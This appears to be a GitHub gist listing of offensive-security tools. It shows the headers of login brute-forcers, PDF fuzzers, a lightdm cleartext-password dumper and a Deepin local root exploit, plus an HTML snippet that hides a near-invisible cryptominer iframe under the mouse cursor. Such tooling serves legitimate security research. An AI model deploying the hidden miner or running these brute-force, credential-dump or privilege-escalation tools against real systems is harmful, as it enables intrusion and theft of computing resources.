This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # | |
| # MSF RPC login brute force | |
| # | |
| require 'msfrpc-client' | |
| require 'thread' | |
| MAX_THREADS = 3 | |
| puts 'MSF RPC login brute force' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| ################################################### | |
| # ----------------------------------------------- # | |
| # Fuzz pdf-reader Ruby gem with mutated PDF files # | |
| # ----------------------------------------------- # | |
| # # | |
| # Each test case is written to 'fuzz.pdf' in the # | |
| # current working directory. # | |
| # # | |
| # Crashes and the associated backtrace are saved # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # | |
| # A Ruby port of Charlie Miller's infamous 5 line Python dumb fuzzer | |
| # ~ bcoles | |
| =begin | |
| # Original Python code: | |
| numwrites = random.randrange(math.ceil((float(len(buf)) / FuzzFactor))) + 1 | |
| for j in range(numwrites): | |
| rbyte = random.randrange(256) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| ################################################################################ | |
| # BearWare TeamTalk login brute force # | |
| # # | |
| # Tested on TeamTalk versions 5.2.2.4885 and 5.2.3.4893 # | |
| # # | |
| # Note: SSL support is implemented but untested # | |
| ################################################################################ | |
| # ~ bcoles |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| ################################################################################ | |
| # Cain Wireless Scanner export to CSV # | |
| # ----------------------------------- # | |
| # This script takes a text file of wireless networks exported from Cain # | |
| # and converts it to CSV. # | |
| ################################################################################ | |
| # ~ bcoles | |
| require 'csv' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01"> | |
| <iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe> | |
| </div> | |
| </body> | |
| <script> | |
| window.onmousemove = function(e) { | |
| var container = document.getElementById("container"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| ################################################### | |
| # ----------------------------------------------- # | |
| # Fuzz Origami Ruby gem with mutated PDF files # | |
| # ----------------------------------------------- # | |
| # # | |
| # Each test case is written to 'fuzz.pdf' in the # | |
| # current working directory. # | |
| # # | |
| # Crashes and the associated backtrace are saved # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # List sub-domains using crt.sh | |
| set -euo pipefail | |
| IFS=$'\n\t' | |
| error() { | |
| echo "[ERROR] $*" | |
| exit 1 | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # lightdmdump | |
| # --- | |
| # Dump clear text passwords from lightdm sessions on Ubuntu | |
| # Requires root privileges to dump lightdm process memory | |
| # Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS | |
| # --- | |
| # Bug discovered by: Sven Blumenstein | |
| # Disclosure date: 2017-09-15 | |
| # Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit | |
| # | |
| # The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user | |
| # in the sudo group to install arbitrary packages without providing a password, | |
| # resulting in code execution as root. By default, the first user created on | |
| # the system is a member of the sudo group. | |
| # ~ bcoles | |
| # | |
| # Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/ |